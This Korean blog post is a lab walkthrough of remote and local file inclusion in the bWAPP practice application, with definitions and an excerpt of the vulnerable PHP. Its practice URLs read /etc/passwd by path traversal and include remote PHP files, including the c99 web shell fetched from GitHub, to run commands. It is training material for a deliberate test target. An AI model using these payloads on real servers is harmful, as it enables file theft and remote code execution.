삽질블로그
[Kali_Linux] Remote & Local File Inclusion ( RFI/LFI ) | bWAPP | Missing Functional Level Access Control 본문
[Kali_Linux] Remote & Local File Inclusion ( RFI/LFI ) | bWAPP | Missing Functional Level Access Control
삽질장인 2020. 9. 3. 21:25본 내용은 교육 과정에서 필요한 실습 목적으로 구성된 것이며, 혹시라도 개인적인 용도 및 악의적인 목적으로 사용할 경우, 법적 책임은 본인에게 있다는 것을 알려드립니다.
1. Missing Functional Level Access Control
- OWASP Top 10 A7 - 기능 수준의 접근 통제 누락
- 접근 통제 및 검증이 서버 설정, 관리 부분에서 제대로 구성되지 않았을 때 중요 자원 접근이 가능한 취약점이다.
- Ex) 디렉토리 접근, 파일 접근, 파일 다운로드 및 업로드
2. Remote & Local File Inclusion ( RFI / LFI )
- RFI : 외부 서버에 있는 악의적인 파일을 이용하여 내부 서버에 있는 정보를 획득하는 방식
- LFI : 내부 서버 자체적인 취약점을 이용하여 내부 서버에 있는 정보를 획득하는 방식
3. Missing Functional Level Access Control - Remote & Local File Inclusion ( RFI / LFI )
- 이 시나리오는 RFI / LFI 취약점을 이용하여 서버안에 있는 정보를 획득하는 내용이다.
========================실습=============================
1) 첫 화면

2) 'English' 선택 -> Go 버튼 클릭
3) URL 주소 정보 확인
http://192.168.222.132/bWAPP/rlfi.php?language=lang_en.php&action=go
4) LFI 취약점 확인 실시
http://192.168.222.132/bWAPP/rlfi.php?language=../../../etc/passwd&action=go

5) RFI 취약점 확인 실시
http://192.168.20.205/bWAPP/rlfi.php?language=http://net123.tistory.com/attachment/cfile26.uf@9972323B5C72213133E1FE.php&action=go&cmd=cat%20/etc/passwd


6) github에서 제공하는 c99.php(웹쉘) 외부 파일 사용해서 RFI 취약점 확인 실시
http://192.168.222.132/bWAPP/rlfi.php?language=https://raw.githubusercontent.com/tennc/webshell/master/php/PHPshell/c99/c99.php&action=go

7) 'rlfi.php' 파일 내용 확인
bee@bee-box:/var/www/bWAPP$ ls -l rlfi.php
bee@bee-box:/var/www/bWAPP$ vi rlfi.php
case "2" :
$available_languages = array("lang_en.php", "lang_fr.php", "lang_nl.php");
$language = $_GET["language"] . ".php";
// $language = rlfi_check_1($language);
break;